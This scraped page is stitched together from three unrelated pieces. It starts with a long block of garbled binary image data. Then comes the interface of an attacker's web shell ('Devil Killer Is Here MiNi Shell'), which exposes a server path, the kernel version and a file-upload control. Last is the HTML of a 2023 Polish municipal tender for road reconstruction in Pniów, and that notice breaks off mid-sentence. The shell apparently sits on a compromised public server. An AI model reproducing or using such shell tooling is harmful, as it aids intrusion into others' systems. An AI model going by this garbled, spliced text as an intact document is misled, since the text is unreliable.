JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230418/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230418/0018150101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przebudowa dróg gminnych: ul. Srocza Góra i ul. Jaskółcza w Pniowie - poprawa stanu technicznego”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Toszek</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276257771</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bolesława Chrobrego 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Toszek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-180</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">umtoszek@toszek.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.toszek.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przebudowa dróg gminnych: ul. Srocza Góra i ul. Jaskółcza w Pniowie - poprawa stanu technicznego”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a55d1e02-dddc-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00181501</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00001036/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Przebudowa dróg gminnych: ul. Srocza Góra i ul. Jaskółcza w Pniowie- poprawa stanu technicznego.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/toszek <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja między Zamawiającym a Wykonawcami może się odbywać wyłącznie<br/>przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą<br/>elektroniczną, tj.:<br/>1)poprzez Platformę przetargową pod adresem: https://platformazakupowa.pl/pn/toszek.<br/>2)pocztą elektroniczną na adres e-mail Zamawiającego oraz adres mail Wykonawcy. Preferuje się, aby komunikacja między<br/>Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były za<br/>pośrednictwem platformy.<br/>2. Adres strony: https://platformazakupowa.pl/pn/toszek.<br/>3. Ofertę oraz oświadczenie, o którym mowa w art. 125 ust. 1 ustawy PZP składa się pod rygorem nieważności, zgodnie z wyborem<br/>Wykonawcy:<br/>1) w formie elektronicznej (oznacza to postać elektroniczną opatrzoną kwalifikowanym podpisem elektronicznym),<br/>2) w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym- wyłącznie poprzez Platformę.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z art. 61. ust. 1. oraz art. 63 ust. 2 ustawy PZP komunikacja w niniejszym postępowaniu odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej, pliki należy opatrzyć:<br/>-kwalifikowanym podpisem elektronicznym,<br/>- podpisem zaufanym,<br/>- lub podpisem osobistym.<br/>2. Formaty plików wykorzystywanych przez Wykonawców powinny być zgodne z rozporządzeniem Rady Ministrów z dnia 12<br/>kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji<br/>w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (t.j. Dz. U. z 2017 r. poz. 2247).<br/>3. Zamawiający rekomenduje wykorzystanie formatów: .pdf, .doc, .xls, .jpg (.jpeg) ze szczególnym wskazaniem na .pdf.<br/>4. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip lub .7Z.<br/>5. Wśród formatów powszechnych a nie występujących w rozporządzeniu występują: .rar, .gif, .bmp,.numbers, .pages. Dokumenty<br/>złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>6. Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz<br/>na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp<br/>służącej do składania podpisu osobistego, który wynosi max 5MB.<br/>7. Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, Zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę na<br/>format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES. Pliki w innych formatach niż .pdf zaleca się opatrzyć zewnętrznym<br/>podpisem XAdES. Należy pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym.<br/>8. Zamawiający zaleca aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju. Podpisywanie<br/>różnymi rodzajami podpisów np. osobistymi kwalifikowanym może doprowadzić do problemów z weryfikacją plików.<br/>9. Podczas podpisywania plików zaleca się stosowanie algorytmu skrótu SHA2 zamiast SHA1.<br/>10. Jeśli wykonawca pakuje dokumenty np. w plik ZIP zalecamy wcześniejsze podpisanie każdego ze skompresowanych plików.<br/>11. Zamawiający rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu.<br/>12. Zamawiający zaleca aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem kwalifikowanym. Może to skutkować naruszeniem integralności plików co równoważne będzie z koniecznością odrzucenia oferty w postępowaniu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia<br/>4 maja 2016 r.; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Burmistrz Toszka, z siedzibą w Urzędzie Miejskim w Toszku przy ul.<br/>Bolesława Chrobrego 2, 44-180 Toszek;<br/>2) administrator wyznaczył Inspektora Danych Osobowych Panią Lorin Frejno, z którym można się kontaktować pod adresem e-mail:<br/>iod@toszek.pl;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym bez negocjacji;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 ustawy PZP;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP przez okres 4 lat od dnia zakończenia postępowania<br/>o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego<br/>prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o<br/>udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2<br/>RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>2) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych<br/>osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZRP.271.13.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest przebudowa dróg gminnych: ul. Srocza Góra i ul. Jaskółcza w Pniowie - poprawa stanu<br/>technicznego.<br/>2. Zakres przedmiotu zamówienia ustalony jest następująco:<br/>1) przebudowa drogi gminnej nr 620285 S – ul. Srocza Góra,<br/>2) przebudowa drogi gminnej nr 620281 S –ul. Jaskółcza,<br/>3) przebudowa drogi wewnętrznej ul. Słowików.<br/>Przedmiotem zamówienia jest zadanie polegające na:<br/>1) opracowaniu kompletnej dokumentacji projektowej wraz z uzyskaniem niezbędnych opinii, uzgodnień oraz przygotowaniu<br/>materiałów do zgłoszenia robót prowadzonych w istniejącym pasie drogowym (przy ewentualnym sprzeciwie organu<br/>administracji budowlanej do zgłoszenia należy uzyskać pozwolenie na budowę na podstawie ustawy o zagospodarowaniu<br/>przestrzennym), a także uzyskanie innych decyzji administracyjnych niezbędnych do zrealizowania zadania inwestycyjnego.<br/>2) Wykonaniu robót budowlanych na przedmiotowym zadaniu w oparciu o dokumentację projektową opracowaną przez<br/>Wykonawcę.<br/>Zakres zasadniczych robót budowlanych przewidzianych do zaprojektowania i wykonania:<br/>a) Roboty przygotowawcze i rozbiórkowe:<br/>- roboty pomiarowe związane z wytyczeniem sytuacyjno- wysokościowy obiektu<br/>- roboty pomiarowe związane z wytyczeniem sytuacyjno- wysokościowy obiektu<br/>- wycinka istniejącego drzewostanu kolidującego z przewidzianym zakresem robót<br/>- zdjęcie warstwy ziemi urodzajnej na poszerzeniach korpusu drogowego<br/>- rozbiórka istniejącej nawierzchni bitumicznej jezdni<br/>- rozbiórka istniejących zjazdów do posesji<br/>- rozbiórka lub przebudowa kolidującego uzbrojenia ; sieć gazowa, sieć teletechniczna, sieć elektroenergetyczna<br/>- zabezpieczenie istniejących sieci poprzez założenie rur ochronnych<br/>b) roboty ziemne,<br/>- wykopy pod wykonanie pełnej konstrukcji nawierzchni – korytowanie<br/>- wykonanie nasypów dla poszerzenia korpusu drogi<br/>c) odwodnienie drogi<br/>- wykonanie odwodnienia powierzchniowego w postaci czyszczenia i regulacji istniejących rowów przydrożnych wraz z wyposażeniem (uzupełnienie rur przepustowych pod zjazdami)<br/>d) budowa nowej konstrukcji nawierzchni jezdni<br/>- wzmocnienie podłoża<br/>- podbudowa<br/>- pakiet warstw bitumicznych<br/>e) budowa nowych zjazdów do posesji oraz odtworzenie zjazdów już istniejących<br/>- podbudowa<br/>- kostka betonowa na warstwie ścieralnej<br/>- w przypadku zjazdów istniejących z kostki kamiennej oraz nowej kostki betonowej odtworzenie warstwy ścieralnej<br/>f) roboty wykończeniowe<br/>- plantowanie i humusowanie skarp (rowów) nasypów , gruntu rodzimego<br/>- wykonanie poboczy umocnionych kruszywem dla przekroju drogowego<br/>- wykończenie i porządkowanie terenu zarówno w pasie drogowym jak i poza nim na działkach przyległych - naruszonych przez Wykonawcę w czasie realizacji robót,<br/>g) elementy zabezpieczenia ruchu BRD<br/>- stała organizacja ruchu ( oznakowanie poziome i pionowe)<br/>- organizacja ruchu na czas prowadzenia robót<br/>h) elementy związane z organizacją procesu budowlanego<br/>- wykonanie dokumentacji dla realizacji zadania inwestycyjnego<br/>- projekt zagospodarowania terenu<br/>- projekty architektoniczno- budowlane dla każdej z branż<br/>- projekty techniczne dla każdej z branż<br/>- niezbędne uzgodnienia i decyzje do projektu budowlanego<br/>- projekt stałej organizacji ruchu<br/>- projekt organizacji ruchu na czas prowadzenia robót<br/>- pełnienie nadzoru autorskiego<br/>- przygotowanie dokumentów do wniosku o pozwolenia na użytkowanie i zgłoszenia zakończenia robót,<br/>- sporządzenie inwentaryzacji powykonawczej,<br/>- wszelkie inne roboty jakie okażą się niezbędne dla wykonania przedmiotu zamówienia.<br/>i) przygotowanie zaplecza placu budowy<br/>- pozyskanie terenu dla lokalizacji zaplecza budowy<br/>- organizacja biura budowy<br/>- organizacja placu składowego na ; elementy rozbiórkowe i wycinkę drzew ,<br/>- organizacja placu składowego na elementy do wbudowania; kruszywa, elementy betonowe do zabudowy (krawężniki,<br/>obrzeża, kostka) elementy kanalizacji deszczowej (rury, studnie, wpusty). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający wybiera ofertę najkorzystniejszą w każdej z części zamówienia na podstawie kryteriów oceny ofert określonych w SWZ. Kryteria oceny ofert w niniejszym postępowaniu stanowią: <br/><br/>Cena (C) – 60 %<br/>Warunki płatności za Etap A (W) – 40 %<br/>2.	Ocena ofert zostanie przeprowadzona na podstawie przedstawionych w pkt 1 kryteriów oraz ich wag. Oferty oceniane będą punktowo. W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane będą punkty za powyższe kryteria według następujących zasad i według wzoru:<br/>S = C + W<br/>gdzie:<br/><br/>S – suma (ilość) punktów, jaką po uwzględnieniu wag może osiągnąć oferta /maks. 100 pkt/<br/><br/>2.1.	C – ilość punktów, jaką może osiągnąć oferta w kryterium „Cena” – maks. 60 pkt liczona wg wzoru:<br/>C N<br/>C = --------- x 100 punktów x 60%<br/> C OB<br/>gdzie:<br/>CN – najniższa cena oferowana przez Wykonawców<br/>COB – cena oferty badanej<br/><br/>2.2.	W – ilość punktów, jaką może osiągnąć oferta w kryterium „Warunki płatności za Etap A”- maks. 40 pkt.<br/><br/>Wykonawca zobowiązany jest wskazać wartość procentową wynagrodzenia za wykonanie Etapu A jako procent wynagrodzenia brutto za wykonanie całości zamówienia. Wartość procentowa może zostać określona przez Wykonawcę w przedziale od 2,0% do 5%.<br/>Ocena punktowa w kryterium „Warunki płatności za Etap A” zostanie przeprowadzona w następujący sposób:<br/>1)	w przypadku gdy wartość procentowa za wykonanie Etapu A zawierać się będzie w<br/>przedziale od 2,1% do 5%, oferta otrzyma 0 pkt,<br/>2)	w przypadku gdy wartość procentowa za wykonanie Etapu A wynosić będzie 2%,<br/>oferta otrzyma 40 pkt.<br/>3.	Za najkorzystniejszą w każdej części zamówienia uznana zostanie oferta, która uzyska największą wartość punktową, obliczoną wg wzorów z pkt 1.<br/>4.	Wyliczenie punktów zostanie dokonane z dokładnością do dwóch miejsc po przecinku, zgodnie z matematycznymi zasadami zaokrąglania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Warunki płatności za Etap A</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy:<br/>1. Spełniają warunki udziału w postępowaniu określone w art. 112 ust. 2 PZP dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa szczegółowego warunku w tym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie określa szczegółowego warunku w tym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>W zakresie zdolności ekonomicznej lub finansowej niezbędnej do realizacji zamówienia Zamawiający wymaga, aby<br/>Wykonawca posiadał zdolność kredytową lub środki finansowe w wysokości nie mniejszej niż 800.000,00 zł (słownie:<br/>osiemset tysięcy złotych 00/100).<br/>4) zdolności technicznej i zawodowej:<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>W zakresie zdolności technicznej lub zawodowej Zamawiający wymaga, aby:<br/>a) Wykonawca posiadał odpowiednie doświadczenie, przy czym Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, zgodnie z zasadami sztuki budowlanej wykonał i prawidłowo ukończył co najmniej<br/>dwa zamówienia polegające<br/>na budowie lub przebudowie drogi klasy co najmniej lokalnej o długości<br/>nie mniejszej niż 500mb,<br/>b) Wykonawca dysponował odpowiednimi osobami skierowanymi do 